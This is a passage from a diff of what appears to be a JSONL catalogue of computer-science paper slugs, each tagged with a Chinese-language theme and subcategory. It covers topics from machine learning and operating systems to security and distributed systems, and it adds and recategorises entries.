+{"slug":"lfm2-5-8b-a1b-moe","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"lfs-1991","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"li-2018-redner","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"li-t-closeness-2007","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"lieberman-realtime-gc","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"liger-kernel-llm-training","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"lindholm-2008-tesla","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"linear-attention-still-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"linear-scan-reg-alloc","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"linear-types","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"linearizability-1990","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"lion-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"lipp-meltdown-2018","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"liquid-types","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"liskov-abstraction-1974","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"liu-2020-dlss","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"livevlm-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"llama-vid-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} @@ -487,29 +643,42 @@ {"slug":"llava-onevision-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"llava-video-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"llava","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"多模态 / NLP","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"llm-as-judge","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与算法","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"llm-int8-2022","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"llm-serving-needs-math","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"llm-wiki-retrieval-reasoning","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} +{"slug":"llmsurgeon-data-mixture","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"llmsurgeon-diagnosing-data-mixture-of-large-language-models-arxiv-2605-30348","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"llmvs-2025","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"llvm","area":"papers","theme":"编译器","themeId":"compilers","subcategory":"编译器","source":"category","confidence":"high","rawCategory":"编译器"} {"slug":"lmdb-2011","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"local-type-inference","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"locus-1980","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"log4shell-cve-2021-44228","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"logjam-2015","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"logoot-2010","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"lomo-modality","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"long-video-retrieval-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"longformer-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"longformer-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"longva-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"longvideobench-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"longvila-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"lookahead-decoding-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"loong-doc-mt","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"loong-long-document-translation-agent-with-observe-and-act-arxiv-2605-30274","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"loop-1987-subdivision","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"lopez-de-prado-trio-2018","area":"papers","theme":"其他","themeId":"other","subcategory":"量化金融","source":"candidates.topic","confidence":"high","rawCategory":"其他"} {"slug":"lottery-1994","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"lottery-scheduling-1994","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"lottery-ticket-2019","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"low-rank-adapt-survey","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"微调","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"lsh-indyk-1998","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"lsm-tree-1996","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"lstm-1997","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"lucky13-2013","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"lvbench-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"mach-1986","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"mach-rashid-1986","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"mach-vm-1987","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"machanavajjhala-l-diversity-2007","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"macklin-2014-position-based-fluids","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} @@ -517,45 +686,68 @@ {"slug":"mae","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"计算机视觉 / 自监督","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"magic3d-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"mahajan-2002-bgp-misconfig","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} -{"slug":"mamba","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"NLP / 深度学习","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"mamba","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ml","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"maml-2017","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"mapreduce","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"分布式系统","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"marching-cubes-1987","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"marlin-w4a16-kernel","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"maron-kuhns-1960","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"marques-silva-grasp-1996","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"martin-lof-itt","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"maskalign","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"扩散模型","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"matter-protocol-1-0","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"mattern-1989","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"maxproof","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ai-ml-models","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"maxwell-architecture-2014","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"mccarthy-lisp","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"编程语言","source":"category","confidence":"high","rawCategory":"编程语言"} {"slug":"mcfarling-bp-1993","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"mcmahan-fedavg-2017","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"mcmillan-smv-1993","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"mcp-is-dead-debate","area":"papers","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} +{"slug":"mcp-solver","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"约束求解","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"mcp-spec","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 工程","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"mcp-survey","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"LLM架构","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"mcs-locks-1991","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"meagher-1982-octree","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"medcase-fhir","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"medusa-2024","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"megastore-2011","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} -{"slug":"megatron-lm","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"模型与训练","source":"category","confidence":"high","rawCategory":"分布式系统"} +{"slug":"megatron-core-moe-2026","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"megatron-lm","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"系统综合","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} +{"slug":"meltdown-attack-2018","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"mem-ft-lora","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"memcached-fb-2013","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"memcoder-co-evolution","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} +{"slug":"memdreamer","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} +{"slug":"memory-tool-use-agents","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"mencius-2008","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"mermaid","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"工具与基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} {"slug":"mesa-optimization-2019","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"mesos-2011","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"metagpt","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体与 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"metaml-multi-stage","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"metaocaml-2003","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"metcalfe-boggs-1976","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"microtvm-2020","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"milestone-multi-objective-compiler-phase-ordering-arxiv-2605-23435","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"milestone-phase-order","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"mills-ntp-1991","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"millwheel-2013","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"milner-pi-calculus","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"milvus-2021","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"mimalloc-leijen-2019","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"mind-skill","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} {"slug":"mine-octagon-2006","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"minhash-broder-1997","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} +{"slug":"mini-max-sparse-attention","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"LLM系统","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"minicpm-v-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"category","confidence":"high","rawCategory":"机器学习"} +{"slug":"minimax-m2-series","area":"papers","theme":"其他","themeId":"other","subcategory":"llm","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} +{"slug":"minimax-sparse-attention","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"minisat-2003","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} {"slug":"mips-1981","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"mira-rubric","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"mirage-2013","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"mirage-unikernel-2013","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"mironov-renyi-dp-2017","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} {"slug":"misevolution-2509","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} {"slug":"mitls-2014-triple-handshake","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} @@ -573,33 +765,50 @@ {"slug":"mmskills-multimodal","area":"papers","theme":"Agent","themeId":"agents","subcategory":"智能体与 LLM","source":"candidates.topic","confidence":"high","rawCategory":"Agent"} {"slug":"mockapetris-1988-dns","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"mode-connectivity-2018","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"model-native-computing","area":"papers","theme":"基础设施","themeId":"infrastructure","subcategory":"系统综合","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} {"slug":"moesi-cache-coherence-1986","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"GPU 架构","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"mogul-1995-persistent-http","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"monaco-editor-2016","area":"papers","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} {"slug":"monaghan-1992-sph","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"monetdb-cracking-2007","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"monetdb-x100-2005","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"monitors-1974","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} +{"slug":"monotone-erasure-codes-arxiv-2605-22426","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"mooncake-kvcache-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 系统","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"morsel-driven-2014","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} +{"slug":"moverse","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频生成","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} {"slug":"moviechat-2024","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"mplug-owl-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"mptcp-2012","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"mqtt-s-2008","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} +{"slug":"mqtt-v5-spec","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式与 IoT","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"ms-marco-2016","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"mueller-2007-pbd","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"mueller-2022-instant-ngp","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"multi-round-visibility-post-consensus-ordering-layer-for-dag-bft-arxiv-2605-2343","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"multics-1965","area":"papers","theme":"操作系统","themeId":"operating-systems","subcategory":"内核与虚拟化","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} {"slug":"muzero","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"强化学习","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"mvbench-2023","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} {"slug":"mycroft-strictness","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} +{"slug":"n-grpo","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"强化学习","source":"candidates.topic+category","confidence":"high","rawCategory":"机器学习"} +{"slug":"naiad-2013-sosp","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"naiad-2013-sosp2013","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"category","confidence":"high","rawCategory":"分布式系统"} {"slug":"naiad-2013","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} +{"slug":"naiad-murray-2013","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"narwhal-tusk-2022","area":"papers","theme":"分布式系统","themeId":"distributed-systems","subcategory":"共识与复制","source":"candidates.topic","confidence":"high","rawCategory":"分布式系统"} {"slug":"nbeats-2020","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} +{"slug":"nee-lv-gta-loading-times","area":"papers","theme":"编程语言","themeId":"programming-languages","subcategory":"类型与 PL 理论","source":"candidates.topic","confidence":"high","rawCategory":"编程语言"} {"slug":"nelson-oppen-1979","area":"papers","theme":"形式化方法","themeId":"formal-methods","subcategory":"形式化验证","source":"candidates.topic","confidence":"high","rawCategory":"形式化方法"} +{"slug":"nemotron-3-super","area":"papers","theme":"其他","themeId":"other","subcategory":"llm","source":"candidates.topic+category","confidence":"high","rawCategory":"其他"} {"slug":"nerf-2020","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} +{"slug":"nestedkv","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"模型与训练","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} {"slug":"netflix-bellkor-2009","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"netkat-2014","area":"papers","theme":"网络协议","themeId":"network-protocols","subcategory":"网络协议","source":"candidates.topic","confidence":"high","rawCategory":"网络协议"} {"slug":"neumann-2015-large-joins","area":"papers","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} {"slug":"neumf-2017","area":"papers","theme":"信息检索","themeId":"info-retrieval","subcategory":"检索与排序","source":"candidates.topic","confidence":"high","rawCategory":"信息检索"} {"slug":"newcombe-2011-kinectfusion","area":"papers","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} {"slug":"newsome-taintcheck-2005","area":"papers","theme":"安全与隐私","themeId":"security-privacy","subcategory":"安全与隐私","source":"candidates.topic","confidence":"high","rawCategory":"安全与隐私"} +{"slug":"nexus-prefill-decode-intra-gpu","area":"papers","theme":"机器学习","themeId":"machine-learning","subcategory":"ML 